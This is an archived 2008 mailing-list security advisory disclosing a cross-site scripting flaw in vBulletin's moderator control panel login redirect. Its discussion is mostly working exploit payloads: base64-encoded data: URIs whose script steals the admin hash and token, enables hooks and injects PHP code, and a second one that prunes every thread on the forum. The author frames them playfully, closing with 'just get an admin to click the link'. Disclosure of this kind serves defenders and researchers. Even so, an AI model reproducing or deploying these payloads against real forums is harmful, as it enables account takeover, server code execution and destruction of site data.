lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 19 Jun 2008 14:09:38 +0100 From: "Jessica Hope" <jessicasaulhope@...glemail.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, jessicasaulhope@...glemail.com Subject: vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1: XSS in modcp index ====================================================================== Advisory : XSS in modcp index Release Date : June 17th 2008 Application : vBulletin Version : vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1 and lower Platform : PHP Vendor URL : http://www.vbulletin.com/ Authors : Jessica Hope (jessicasaulhope@...glemail.com), Friends who wish to remain anonymous. ======================================================================= Overview Due to various failures in sanitising user input, it is possible to construct XSS attacks that are rather damaging. ======================================================================= Discussion The XSS in question exists on the login page for the MCP (moderation control panel). The login script takes a redirect parameter that lacks sanitation, allowing a rather easy XSS: http://localhost/vB3/modcp/index.php?redirect={XSS} What is even better is that the exploit will work outright if the admin/moderator is already logged in; if the admin/moderator is not, they will be required to log in. However, if an admin logs into the MCP, he is also logged into the ACP, allowing the same exploit as last time (remote PHP code injection via the hooks system). If you Base64-encode your attack vector using the data: URI scheme, the XSS survives the login request and activates after the admin/moderator is logged in. A simple example of the above: http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K In this case (as per the last case as well), you have an unlimited and unaltered XSS space, so you're free to invoke some AJAX and have fun. Just to give ideas on how this could turn into something larger, vBulletin has hooks that operate using eval(), and new hooks can be added via the ACP itself. It is trivial to write some JS that not only enables hooks but also inserts a nice RFI hook. Here's one using the data URI: data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3Rv O3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K The above will survive a login prompt. It will then, once executed, proceed to parse one of the ACP pages and extract the admin hash and token, then it will enable hooks and add one that executes phpinfo(). Obviously the above requires an admin in this context. Similar techniques could be used to exploit the modcp as usual, banning users, enabling the pruning of threads etc. If you want to cause annoyance, you can esally exploit just a moderator (and thus have more success in the exploit being run). This example enables pruning for all forums on all posts: data:text/html;base64,PHNjcmlwdD5ldmFsKCJ2PSdodHRwOi8vbG9jYWxob3N0L3ZCL21vZGNwL3RocmVhZC5waHA/ZG89Jzt1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz1uZXcgWE1MSHR0cFJlcXVlc3QoKTtyZWcub3BlbignR0VUJyx2KydwcnVuZScsZmFsc2UpO3JlZy5zZW5kKG51bGwpO3I9cmVnLnJlc3BvbnNlVGV4dDtoPScmYWRtaW5oYXNoPScrci5zdWJzdHIoci5pbmRleE9mKCdoYXNoXCInKSsxMywzMik7dG89JyZzZWN1cml0eXRva2VuPScrci5zdWJzdHIoci5pbmRleE9mKCd0b2tlblwiJykrMTQsNDApO3M9J3RocmVhZFsnO3QyPXMrJ29yaWdpbmFsZGF5c29sZGVyXT0wJicrcysnb3JpZ2luYWxkYXlzbmV3ZXJdPTAmJytzKydsYXN0ZGF5c29sZGVyXT0wJicrcysnbGFzdGRheXNuZXdlcl09MCYnK3MrJ3JlcGxpZXNsZWFzdF09MCYnK3MrJ3JlcGxpZXNtb3N0XT0tMSYnK3MrJ3ZpZXdzbGVhc3RdPTAmJytzKyd2aWV3c21vc3RdPS0xJicrcysnaXNzdGlja3ldPS0xJicrcysnc3RhdGVdPWFueSYnK3MrJ3N0YXR1c109YW55JicrcysnZm9ydW1pZF09LTEmJytzKydwb3N0ZWR1c2VyXT0mJytzKyd0aXRsZWNvbnRhaW5zXT0mJytzKydzdWJmb3J1bXNdPTEmdHlwZT1wcnVuZSZkbz1kb3RocmVhZHMnK2grdG87cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJl YWRzJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpO3g9cjIucmVzcG9uc2VUZXh0O3QyPSdkbz1kb3RocmVhZHNhbGwmdHlwZT1wcnVuZSYnK2grdG8rJyZjcml0ZXJpYT0nK2VzY2FwZSgoeC5zdWJzdHIoeC5pbmRleE9mKCdyaWEnKSsxMiw3NDcpKS5yZXBsYWNlKC8mcXVvdDsvZywnXCInKSk7cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzYWxsJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpOyIpOzwvc2NyaXB0Pg== In order to exploit, just get an admin/moderator to click the link. ======================================================================= Solution: Update to 3.7.1 PL2 or 3.6.10 PL2 ======================================================================= _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists